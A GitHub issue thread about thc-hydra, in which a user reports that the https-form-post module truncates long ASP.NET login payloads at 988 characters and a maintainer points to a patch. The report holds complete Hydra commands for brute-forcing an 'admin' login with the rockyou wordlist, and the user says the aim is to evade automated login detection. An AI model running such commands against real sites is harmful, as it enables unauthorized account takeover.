### ISSUE TITLE
Hydra http(s)-form-post can't handle some ASP.NET POST request payloads

### ISSUE THREAD

**Issue by tjgerot** [vanhauser-thc/thc-hydra#218]
My intent with the following Hydra command is to near perfectly replicate the POST requests sent by a browser as to evade automated login detection. Therefore, I am including all of the parameters in the POST request (including params such as `__EVENTARGUMENT`, `__VIEWSTATEENCRYPTED`, etc.). When I go from this command with only the basics:

`hydra www.test.example.com https-form-post "/login.aspx:dnn%24ctr4616%24Login%24Login_DNN%24txtUsername=^USER^&dnn%24ctr4616%24Login%24Login_DNN%24txtPassword=^PASS^:Login Failed" -l admin -P /usr/share/wordlists/rockyou.txt -w 30 -t 1 -d -f`

To the complete POST request:

`hydra www.test.example.com https-form-post "/login.aspx:ScriptManager=dnn%24ctr4616%24dnn%24ctr4616%24Login_UPPanel%7Cdnn%24ctr4616%24Login%24Login_DNN%24cmdLogin&StylesheetManager_TSSM=%3BTelerik.Web.UI%2C%20Version%3D2013.2.717.40%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D121fae78165ba3d4%3Aen-US%3Aa713c6a1-0827-4380-88eb-63855ca4c2d9%3A45085116%3A27c5704c&ScriptManager_TSM=%3B%3BSystem.Web.Extensions%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%3Aen%3A7dd8b7c5-dd18-48e6-97c2-5a5a060b2752%3Aea597d4b%3Ab25378d2%3BTelerik.Web.UI%2C%20Version%3D2013.2.717.40%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D121fae78165ba3d4%3Aen%3Aa713c6a1-0827-4380-88eb-63855ca4c2d9%3A16e4e7cd%3Af7645509%3Aed16cbdc&__EVENTTARGET=dnn%24ctr4616%24Login%24Login_DNN%24cmdLogin&__EVENTARGUMENT=&__VIEWSTATE=52MYqHMeC7vLTZzKN6Ghx8stTNPCyxKvGZ1f15IO5VjpjURZe4OEK7eClYLDBV7ilNsMmeYE%2BwYSnU8sIJjFQi1EmpmCFfaL7kfS7YaQfETzYl54bH88Lu9uK3RxFzWI4v5cQxkAmRoIh%2BPK8Tdrn835BRb1B%2B2NIDNH02UqFOqhLxnLrpeQdf2TYs9nn2FewPRxa8TNnqj3BD0B6FzIT%2Fj6NdN5DZFF3vG8co9T5zqzsQyMcp5FwxP77li8V6p9bEFUlnn5k%2FJ8ZsxQt1CPwBG%2F0wJkfC4gk8GRG%2Buw0Ys4eKKKXyEUq736lI2HRnbt8Zjjqxzphb%2F49liHEsuZEG24b%2FumBs3a6kAvFeCzRoIyppxLEFbuNTkFL%2Fuz3fdLNGhanSxJrg1ru61sLaqR2tU3994wkYUQ%2BASkg%2B6QCUK5LAqAK84Xeq4Zjvxhncn2%2BBI4QMky4grGUtmNbwrQyZ0uAIYPheWGxa4U1FxUwl95c0DqYF8O7y5olTJrFPpv6qdcXm%2BNw25FftCCMDyYSJMITXVBC0uiPaoosjcKCLCGFtRMTZ1UajjR2QJglImbdq4%2F4VWR9jhP5a54RrNUx72tQqE%3D&__VIEWSTATEGENERATOR=CA0B0334&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=Yh84Nc3E8qsp7vERqOrM%2Bwdz4Hz%2FDczmaJf9kXaK7HiTZOfVQR71AbaaxjxLvXvfGE8a319ck8RL5VJxcHXSwiQFG5RHCH7SvybB5VQ%2Bes%2B%2BGtsDO1PhdXc0pjGr8vSdHYcDhAJUtfKZoJ7eUaU62r33OVQtMLfrAqq6tbNqx%2F%2Bn3AH95vk2xJmPXURwo6Z3X6G8UBA57A9g5KikdfxKT%2Fap0ZdKcnZfQU6nuf9KjgJqLe4%2F5UfY9WldCtJvjNDZhVouFccCDoZ3pFq5TwT4svs3WuXN522alQIsP5sERp%2F%2F7benyobrU%2BHYH4Q%3D&dnn%24dnnSEARCH%24txtSearch=Search...&dnn%24dnnSEARCH2%24txtSearch=Search...&dnn%24ctr4616%24Login%24Login_DNN%24txtUsername=^USER^&dnn%24ctr4616%24Login%24Login_DNN%24txtPassword=^PASS^&ScrollTop=295&__dnnVariable=%60%7B%60__scdoff%60%3A%601%60%2C%60sf_siteRoot%60%3A%60%2F%60%2C%60sf_tabId%60%3A%60600%60%7D&__RequestVerificationToken=cIOdfZYsYgaKs8N1gyUxUsnJomVpUrlLuouMoVY__kwErFNq1mVyVn2VVXJOtzFa_Oz-QzBx5VJrKNB5a8HJhmMzh6lXOeOrIEJBa1rFKu_nmq-IjevM484fINA1&__ASYNCPOST=true&RadAJAXControlID=dnn_ctr4616_Login_UP:Login Failed" -l admin -P /usr/share/wordlists/rockyou.txt -w 30 -t 1 -d -f`

It refuses to execute the command with the following error message: `[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: ScriptManager=dnn%24ctr4616%24dnn%24ctr4616%24Login_UPPanel%7Cdnn%24ctr4616%24Login%24Login_DNN%24cmdLogin&StylesheetManager_TSSM=%3BTelerik.Web.UI%2C%20Version%3D2013.2.717.40%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D121fae78165ba3d4%3Aen-US%3Aa713c6a1-0827-4380-88eb-63855ca4c2d9%3A45085116%3A27c5704c&ScriptManager_TSM=%3B%3BSystem.Web.Extensions%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%3Aen%3A7dd8b7c5-dd18-48e6-97c2-5a5a060b2752%3Aea597d4b%3Ab25378d2%3BTelerik.Web.UI%2C%20Version%3D2013.2.717.40%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D121fae78165ba3d4%3Aen%3Aa713c6a1-0827-4380-88eb-63855ca4c2d9%3A16e4e7cd%3Af7645509%3Aed16cbdc&__EVENTTARGET=dnn%24ctr4616%24Login%24Login_DNN%24cmdLogin&__EVENTARGUMENT=&__VIEWSTATE=52MYqHMeC7vLTZzKN6Ghx8stTNPCyxKvGZ1f15IO5VjpjURZe4OEK7eClYLDBV7ilNsMmeYE%2BwYSnU8sIJjFQi1EmpmCFfaL7kfS7YaQfETzYl54bH88Lu9uK3RxFzWI4v5cQxkAmRoIh%2BPK8Tdrn835BRb1B%2B2NIDNH02UqFOqhLxnLrpeQdf2TYs9nn2FewPRxa8TNnqj3`

At that point, it appears Hydra cut off the rest of the POST requests parameters after 988 characters, meaning it won't find the `^USER^` and `^PASS^` variables. I can't find any characters that would escape the string (as the next one is `B`) so my only guess it it truncates the POST request. Can someone confirm this issue?

**Comment by petrock6** [comment]
The current stable release of Hydra does cut off after 988 characters. However, I have included a patch in the past week to increase the limit to around 6000 characters. Please download and compile the latest development version from Github and tell me if you still have issues.

**Comment by tjgerot** [comment]
Thanks, after upgrading to the master branch of this repo, I had no issues with character limitations. I was running the version installed in Kali Linux (8.3). I'm anxious to see this new version be the base for new Kali builds. Good work.
